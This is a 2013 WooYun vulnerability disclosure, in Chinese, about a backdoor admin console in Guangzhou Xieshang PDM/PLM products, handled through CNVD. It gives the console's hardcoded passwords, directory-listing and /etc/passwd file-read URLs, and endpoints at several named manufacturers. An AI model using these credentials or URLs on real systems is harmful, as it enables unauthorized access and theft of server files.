当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044120

漏洞标题:广州协商科技产品"后门"直接威胁各大制造业厂商

相关厂商:广州协商科技

漏洞作者: loli

提交时间:2013-11-26 18:08

修复时间:2014-01-10 18:08

公开时间:2014-01-10 18:08

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-26: 细节已通知厂商并且等待厂商处理中
2013-11-29: 厂商已经确认,细节仅向厂商公开
2013-12-09: 细节向核心白帽子及相关领域专家公开
2013-12-19: 细节向普通白帽子公开
2013-12-29: 细节向实习白帽子公开
2014-01-10: 细节向公众公开

简要描述:

广州协商科技产品(PDM/PLM/CPC)等"后门"直接威胁各大制造业巨头。

详细说明:

通过测试官方站点,发现所有产品都存在/cpcconsole/这个目录
经反编译class文件发现cpcconsole后台万能密码为cpc和sinocc
该cpcconsole后台可读取和下载服务器上所有文件,很强大。


列目录:
http://localhost/cpcconsole/filelist.jsp?dir=/
读文件:
http://localhost/cpcconsole/fileview.jsp?path=/etc/passwd


QQ截图20131126162739.jpg


QQ截图20131126162900.jpg

漏洞证明:

美的:
http://rdcrm.midea.com.cn:9083/cpcconsole/
http://rdscm.midea.com.cn:7008/cpcconsole/
http://ebs.midea.com.cn/cpcconsole/
http://ccs.midea.com.cn:9085/cpcconsole/
http://rdbcs.midea.com.cn:8000/cpcconsole/
http://pdm.midea.com.cn/cpcconsole/
吉利:
http://cpc.geely.com/cpcconsole/
http://cpc2.geely.com/cpcconsole/
http://m.geely.com/cpcconsole/
TCL:
http://cpc.hn.tcl.com/cpcconsole/
http://cpc.tclac.com/cpcconsole/
志高空调:
http://appserver.china-chigo.com/cpcconsole/
http://erp.chigo-cac.com/cpcconsole/
太多了,贴张图

QQ截图20131126163637.jpg


修复方案:

~~cpcconsole放产品里干嘛的!

版权声明:转载请注明来源 loli@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-11-29 22:24

厂商回复:

CNVD确认并复现所述情况,已经在27日由CNVD直接联系软件生产厂商—— 广州协商科技有限公司,并附上测试实例,建议其主动做好用户的安全响应工作。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-12-20 10:48 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    来源的?

  2. 2014-03-05 10:07 | I am XiaoM ( 路人 | Rank:3 漏洞数:4 | 看着大家的Rank我深深被伤了...)

    真奸,去年年初就发现的问题现在才报?

  3. 2014-03-05 10:13 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @I am XiaoM 看着大家的Rank我深深被伤了...